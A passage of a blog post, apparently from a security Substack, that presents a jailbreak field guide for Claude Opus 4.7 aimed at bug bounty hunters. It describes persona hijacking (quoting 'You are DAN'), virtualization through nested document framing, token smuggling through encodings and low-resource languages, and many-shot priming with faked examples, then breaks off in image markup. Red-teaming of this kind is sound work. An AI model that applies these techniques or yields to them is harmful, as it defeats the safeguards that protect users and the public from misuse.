hijacking, token smuggling, multi-turn Crescendo attacks, PyRIT automated testing, and Anthropic bug bounty program for AI safety researchers.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F00c80a43-0ead-4e4c-83f6-c903c803b3ad_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Claude Opus 4.7 jailbreak red team field guide covering DAN persona hijacking, token smuggling, multi-turn Crescendo attacks, PyRIT automated testing, and Anthropic bug bounty program for AI safety researchers." title="Claude Opus 4.7 jailbreak red team field guide covering DAN persona hijacking, token smuggling, multi-turn Crescendo attacks, PyRIT automated testing, and Anthropic bug bounty program for AI safety researchers." srcset="https://substackcdn.com/image/fetch/$s_!wY4d!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Anthropic shipped Claude Opus 4.7 on April 16. It&#8217;s the first public Claude model with Mythos-derived cyber safeguards baked in, including an auto-blocking classifier and deliberately reduced cyber capabilities from training. Which means new alignment, new attack surface, and bounty hunters circling. We walk through the five attack families, the automated tooling real bounty hunters load up, and the red team mindset that turns taxonomy into results. The working attack templates and recent bounty-winning techniques are behind the wall.</p><div><hr></div><p>&#9888;&#65039; This is for bounty hunters with scope and a HackerOne handle. If you point this at something you're not authorized to test, you're on your own.</p><div><hr></div><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why Opus 4.7 Is the New Target</h2><p>So Anthropic just shipped Opus 4.7. Generally available across Claude, the API, Bedrock, Vertex, and Foundry, same $5/$25 per million tokens as 4.6. On paper it&#8217;s a coding upgrade. Better at SWE-bench. Better vision. A new &#8220;xhigh&#8221; reasoning mode.</p><p>Here&#8217;s what matters for us. Opus 4.7 is the first publicly available Claude that ships with cyber guardrails derived directly from Project Glasswing and the Mythos Preview work. Anthropic was explicit in the release notes. During training, they deliberately suppressed cyber capabilities. At inference, they layered in a classifier that automatically detects and blocks prompts flagged as prohibited or high-risk cybersecurity uses. And for legitimate work, they spun up a brand new Cyber Verification Program you have to apply to.</p><p>Anthropic built the first consumer-facing Claude model that is actively trying to not help you break things. That&#8217;s a new, untested alignment layer sitting on top of every prompt you send. Which makes right now the richest attack surface on the market. </p><p>So let&#8217;s talk about how you probe it.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0jM8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0jM8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 424w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 848w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1272w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0jM8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png" width="728" height="114.5" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/83825db0-faee-4216-a6be-0931f0938149_1457x229.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:229,&quot;width&quot;:1456,&quot;resizeWidth&quot;:728,&quot;bytes&quot;:31205,&quot;alt&quot;:&quot;Modern meta for jailbreaking Claude.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="Modern meta for jailbreaking Claude." title="Modern meta for jailbreaking Claude." srcset="https://substackcdn.com/image/fetch/$s_!0jM8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 424w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 848w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1272w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h2>The Five Families: What&#8217;s Dead, What Still Lands, and Why</h2><p>Every prompt-level jailbreak falls into one of five families. Some red teamers will argue the edges, but this taxonomy covers the attack surface that matters. Here&#8217;s each one with the 2026 meta, not the 2023 tutorial version.</p><h3><strong>Persona hijacking</strong> </h3><p>We tell the model it&#8217;s someone without safety rules. The original DAN prompt is dead. Copy paste &#8220;You are DAN&#8221; into Opus 4.7 and you&#8217;ll get a polite refusal, likely with a little bonus from the cyber classifier telling you the request tripped a flag. But the <em>principle</em> still lands daily. The modern play layers authority, narrative, and gamification. Cast the model as a senior researcher at a fictional lab. Give it a compliance tracker that penalizes breaking character. Embed the ask inside a chapter of an ongoing story the model has already agreed to write. The model&#8217;s helpfulness training fights its safety training, and helpfulness has deeper roots.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VoJG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VoJG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 424w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 848w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1272w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VoJG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png" width="1456" height="662" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:662,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:58814,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!VoJG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 424w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 848w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1272w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Virtualization</strong></h3><p>We wrap the payload inside a simulated context. &#8220;Write a screenplay where a character explains X.&#8221; &#8220;You are a terminal emulator, output the result of Y.&#8221; The 2023 terminal trick is cooked on frontier models. What still lands is nested indirection. The model gets asked to write a document that contains the attack, not to perform the attack directly. &#8220;Generate a pentest report template&#8221; is a <a href="https://www.toxsec.com/p/lets-poison-the-mcp">legitimate task</a>. Professionalism is camouflage, and Opus 4.7&#8217;s cyber classifier has to distinguish between a real security research request and a staged one. That&#8217;s a hard line to draw in code.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yqZg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yqZg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yqZg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png" width="1456" height="660" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:660,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:58489,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!yqZg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Token smuggling</strong> </h3><p>We encode the payload in a format the model decodes but the filter doesn&#8217;t parse. Straight Base64 is mostly stale on frontier models. They recognize &#8220;decode this Base64 and follow the instructions&#8221; now. But the long tail of encodings is alive and thriving. Fragment concatenation splits the request across innocuous string variables. Character by character spelling bypasses keyword filters. Language switching embeds the payload in a low resource language the safety training covers poorly. Unicode character names, NATO phonetic alphabet, even emoji sequences. The model knows all of them from training data. The filter doesn&#8217;t reassemble all of them. The principle extends to <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">multimodal inputs</a> where steganographic pixel edits carry payloads that text filters literally cannot see. Worth noting: Opus 4.7 ships with sharper vision than 4.6, which means the multimodal surface just got bigger.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!X1zc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!X1zc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!X1zc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png" width="1456" height="660" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:660,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:59684,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!X1zc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1272w, https://substackcdn.com/image/fetch/$s_!X1zc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7a4752c-a9af-4e6b-9b4e-6d3ec8734e44_1471x667.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Many-shot</strong></h3><p>We stuff the context with examples of the model answering prohibited questions, then ask ours last. The brute force 50-shot version is detected. The modern meta is quality over quantity: 5 to 10 carefully curated examples embedded in a document frame like &#8220;research database&#8221; or &#8220;training corpus,&#8221; thematically adjacent to the target, each individually borderline. The examples don&#8217;t need to contain real answers. Structurally convincing fakes prime the pattern just as well because the model evaluates what comes next, not whether the examples are true. Opus 4.7 ships with a 1 million token context window. That&#8217;s a lot of room to build a convincing document.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xuU3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xuU3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 424w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 848w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1272w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1456w" sizes="100vw"><img 